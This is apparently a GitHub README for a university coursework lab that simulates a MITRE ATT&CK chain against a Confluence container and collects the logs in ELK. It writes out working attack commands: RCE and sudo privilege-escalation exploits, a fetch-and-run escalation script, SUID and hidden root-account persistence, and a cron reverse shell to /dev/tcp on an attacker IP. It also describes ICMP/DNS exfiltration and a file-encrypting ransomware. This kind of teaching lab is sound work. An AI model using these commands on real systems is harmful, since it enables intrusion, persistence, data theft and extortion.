Skip to content

kevinnivekkevin/3204_coursework_1

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

ICT3204 - Coursework Assignment 1

  • To plan and implement a attack simulation utilizing ATT&CK tactics, techniques
  • To integrate the usage of Vagrant Scripts and Docker Containers
  • To perform log collection, cleaning and visualisation with the use of the ELK stack

Members

  • 2000941 - Ian Peh Shun Wei
  • 2001174 - Kevin Pook Yuan Kai
  • 2001209 - Lim Jin Tao Benjamin
  • 2001267 - Foong Jun Hui
  • 2001558 - Jeremy Jevon Chow Zi You
  • 2001689 - Cham Zheng Han Donovan

MITRE ATT&CK Techniques Chosen

  • Initial Access - Exploit Public-Facing Application
  • Privilege Escalation - Exploit Buffer Overflow
  • Persistence - Exploit SUID Binary File
  • Credential Access - Unsecured Credentials
  • Collection & Exfiltration - Exfiltration via ICMP and DNS
  • Impact - Ransomware

Host Machine Dependencies

  1. Vagrant - https://www.vagrantup.com/downloads
  2. Docker Engine - https://www.docker.com/
  3. If using WSL2
    • Create file .wslconfig in C:\Users\user
    • Edit and add the following line:
[wsl2] 
kernelCommandLine = "sysctl.vm.max_map_count=262144"

Architecture

Wide_Infra

(back to top)

Table of Contents

Part 1 - Spinning Up The Infrastructure

  1. Ensure Docker Engine is running

  2. From within project folder

    HOST-MACHINE@HOST $ vagrant up

    Expected output

    HOST-MACHINE@HOST $ vagrant up
    Bringing machine 'elk' up with 'docker' provider...
    Bringing machine 'kali' up with 'docker' provider...
    Bringing machine 'postgres' up with 'docker' provider...
    Bringing machine 'confluence' up with 'docker' provider...
    ...
    ...
    HOST-MACHINE@HOST $ docker container ls
    CONTAINER ID   IMAGE                           COMMAND                    CREATED           STATUS          PORTS                                                                                                      NAMES
    ...            postgres:14                     "docker-entrypoint.s…"     .. minutes ago    Up xx minutes   0.0.0.0:5432->5432/tcp                                                                                     postgres
    ...            kevinpook/confluence-7.13.0     "/bin/sh -c '/usr/sb…"     .. minutes ago    Up xx minutes   127.0.0.1:2201->22/tcp, 0.0.0.0:80->8090/tcp                                                               confluence
    ...            sebp/elk                        "/usr/local/bin/star…"     .. minutes ago    Up xx minutes   0.0.0.0:5044->5044/tcp, 0.0.0.0:5601->5601/tcp, 0.0.0.0:9200->9200/tcp, 0.0.0.0:9600->9600/tcp, 9300/tcp   elk
    ...            tknerr/baseimage-ubuntu:18.04   "/bin/sh -c '/usr/sb…"     .. minutes ago    Up xx minutes   127.0.0.1:2222->22/tcp                                                                                     kali
    1. Configure imported ELK Dashboard
    HOST-MACHINE@HOST $ vagrant docker-exec elk -- cp /vagrant/config/dashboard/3204_export.ndjson /home
    HOST-MACHINE@HOST $ vagrant docker-exec elk -- curl -X POST "http://127.0.0.1:5601/api/saved_objects/_import?createNewCopies=true" -H "kbn-xsrf: true" --form file=@/home/3204_export.ndjson
    

WSL2

If running on WSL2, note that you need to configure your reinstall your WSL2 kernel to enable logging for the containers spun up by docker. This is because the standard WSL2 kernel comes with the options for CONFIG_AUDIT and CONFIG_NETFILTER_XT_TARGET_AUDIT disabled. The reason is roughly due to the lack of support for SElinux on WSL2, which made this an unnecessary feature. To ensure that logging functionalities on the Confluence machine through the auditd package can work, the kernel must be rebuilt with the asforementioned options enabled.

The reference guide is here. The compiled kernel is located in the project root: bzImage. Just add the bzImage path to the .wslconfig located in the user home directory (C:\Users\User\.wslconfig) => kernel=<path to bzImage>. Restart WSL2 after that and run vagrant up to check if the configuration is successful. Note that this configuration is only tested on WSL2 Ubuntu-20.04 image.

  1. Create the file C:\Users\User\.wslconfig
  2. Add this code (NOTE: make sure to use \\ to escape the \):
[wsl2]
kernel=C:\\Users\\myuser\\...\\3204_coursework_1\\bzImage
  1. Ensure that docker is NOT running
  2. Open command prompt and run wsl --shutdown
  3. The next time you open WSL2 you should be able to see the output as follows
$ uname -a
Linux MYMACHINE 5.15.68.1-microsoft-standard-WSL2-3204+ #1 SMP Tue Oct 25 10:13:28 +08 2022 x86_64 x86_64 x86_64 GNU/Linux

$ zfgrep AUDIT /proc/config.gz
CONFIG_AUDIT=y
CONFIG_HAVE_ARCH_AUDITSYSCALL=y
CONFIG_AUDITSYSCALL=y
CONFIG_AUDIT_ARCH=y
# CONFIG_KVM_MMU_AUDIT is not set
CONFIG_NETFILTER_XT_TARGET_AUDIT=y

Quick Commands

# Get the status of the current vagrant machines
HOST-MACHINE@HOST $ vagrant status

# Delete and stop
HOST-MACHINE@HOST $ vagrant destroy

# Stop only
HOST-MACHINE@HOST $ vagrant halt

(back to top)

Part 2 - Logs, Dashboards and Services

Confluence - Attack Target

Kibana (ELK) Dashboard

(back to top)

Part 3 - Attack Vector and Exploits

The simulated attacker that is used to perform the relevant MITRE ATT&CK techniques can be accessed by utilizing the Attacker/Kali Docker container

HOST-MACHINE@HOST $ docker exec -it kali /bin/bash

Automation

The process of the attacks can be automated by adding the commands to be executed in the host machine into a bash script. The script is passed into the Vagrantfile with the run: "never" parameter, which ensures that it does not run during the normal setup process. To manually activate the individual phases of the attack, run the following command:

HOST-MACHINE@HOST $ vagrant provision --provision-with <configured attack> 

Available configured attacks: initialaccess privesc persistence credentialaccess exfil ransom

Initial Access

CVE-2022-26134 - Confluence RCE

Proof-of-Concept
HOST-MACHINE@HOST $ vagrant provision --provision-with initialaccess
==> kali: Running provisioner: initialaccess (shell)...
	...
    kali: confluence@confluence:/opt/atlassian/confluence/bin$ exit
HOST-MACHINE@HOST $
Reverse Shell Access
HOST-MACHINE@HOST $ docker exec -it kali /bin/bash
root@kali # cd /tmp/1_InitialAccess
root@kali # bash runme.sh
confluence@confluence:/opt/atlassian/confluence/bin $

(back to top)

Privilege Escalation

CVE-2021-3156 - Buffer Overflow Root Shell

https://github.com/CptGibbon/CVE-2021-3156

  • Heap-Based Buffer Overflow in Sudo also known as Baron Samedit
  • Vulnerability exploitation allows low privileged users to gain root privileges
  • Privilege escalation via "sudoedit -s" and a command-line argument that ends with a single backslash character
Running CVE-2021-3156 Exploit
root@confluence:/# su confluence
confluence@confluence:/$ cd /vagrant/attack/2_PrivilegeEscalation
confluence@confluence:/vagrant/attack/2_PrivilegeEscalation$ ./demo_1_cve.sh
root@confluence:/tmp/pe/CVE-2021-3156#

Abuse Elevation Control Mechanism

The python package installer (PIP) can be used by the confluence user to gain sudo access by running an exploit script that abuses over-privilege.

Running PIP Exploit
root@confluence:/# su confluence
confluence@confluence:/$ cd /tmp/pe
confluence@confluence:/tmp/pe$ wget https://gist.githubusercontent.com/kevinnivekkevin/a9c929a632de3ff4c3b03fbbd247c6f2/raw/e740c5d73ff0a8b17ba3b54c2bfebfe102f3f197/sudoers_pe.sh
confluence@confluence:/tmp/pe$ chmod +x sudoers_pe.sh
confluence@confluence:/tmp/pe$ ./sudoers_pe.sh
root@confluence:/#

Automation Script

HOST-MACHINE@HOST $ vagrant provision --provision-with privesc 
HOST-MACHINE@HOST $ vagrant provision --provision-with sudoerspe

(back to top)

Persistence

Persistence Using SUID Binaries

  • After gaining root access via privilege escalation, create suid binary to allow anyone to execute the file.
  • Allows attacker to regain root privileges from low privileged user account.
Setup
root@confluence:/# cd /tmp
root@confluence:/tmp# cp /vagrant/attack/persistence/binarysuid /tmp/suid.c
root@confluence:/tmp# gcc suid.c -o suid
root@confluence:/tmp# chmod 7111 suid
root@confluence:/tmp# rm suid.c
Regain
confluence@confluence:/tmp$ ./suid
whoami
root

Persistence Using Account

  • After gaining root access via privilege escalation, create root privileges account.
  • Allows attacker to regain root privileges by accessing the account.
root@confluence:/tmp# useradd -ou 0 -g 0 systemd
root@confluence:/tmp# chpasswd <<<"systemd:systemd"
Regain
confluence@confluence:/tmp$ echo "import pty; pty.spawn('/bin/bash')" >/tmp/shell.py
confluence@confluence:/tmp$ python /tmp/shell.py
bash: /root/.bashrc: Permission denied
confluence@confluence:/tmp$ su systemd
Password: systemd
# whoami
whoami
root

Persistence Using Crontab

  • After gaining root access via privilege escalation, create crontab to run /bin/bash every 1 min on port 4242.
  • Allows attacker to regain root privileges by listening to port 4242.
root@confluence:/tmp# (crontab -l ; echo "* * * * * sleep 1 && /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.5/4242 0>&1'")|crontab 2> /dev/null
Regain
root@kali:/# nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.0.0.5] from (UNKNOWN) [10.0.0.3] 35094
bash: cannot set terminal process group (23962): Inappropriate ioctl for device
bash: no job control in this shell
root@confluence:~# whoami
root

Automation Script

HOST-MACHINE@HOST $ vagrant provision --provision-with persistence 

(back to top)

Credential Access

DumpsterDiver

DumpsterDiver is a tool that is used to detect any hardcoded secrets like keys or passwords.

LaZagne

LaZagne is an application that is used to retrieve passwords stored on a local computer.

linPEAS

linPEAS is a script that searches for possible paths to escalate privileges on Linux. Its functionalities include searching for possible passwords inside all the accessible files of the system.

Automation Script

HOST-MACHINE@HOST $ vagrant provision --provision-with credentialaccess 
  • Output from the tools used are stored at /tmp/exfiltrate/credentialAccess

(back to top)

Exfiltration

Exfiltrate Data Over ICMP

https://github.com/ariary/QueenSono

Exfiltrate Data Over DNS

https://github.com/m57/dnsteal

  • Collected files are tar-ed from the Confluence server sent to the attacker server via ICMP and DNS
  • All files that are to be exfiltrated can be placed at /tmp/exfiltrate on the Confluence server
  • Files received by the attacker can be found at /tmp/qs/ (ICMP) and /tmp/dnsteal/ (DNS)
  • Data is exfiltrated to the attacker at X minute intervals (currently set to 1).

Automation Script

HOST-MACHINE@HOST $ vagrant provision --provision-with exfil 

(back to top)

Impact

Ransomware Payload

Python Ransomware Sample

  • Run keygen.py to generate the 2048-bit RSA public and private keys used for the encryption process.
  • How the ransomware program works:
    • Encryption done in PKCS#1 OAEP (RSAES-OAEP): Asymmetric cipher based on RSA and OAEP padding.
    • Folders passed in as input to the cryptic (ransomware executable)
    • Folders will be recursively traversed to find files to encrypt.
    • All files found will be encrypted with the public key.
    • All encrypted files will have a new extension .r4ns0m3.
  • After the ransomware has completed running, the original home page for the Confluence will be replaced with a defaced home page located at attack/impact/#.vm

Automation Script

HOST-MACHINE@HOST $ vagrant provision --provision-with ransom 

(back to top)

Documentation

YouTube

youtube

Poster

poster

Kibana Dashboard

dashboard

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages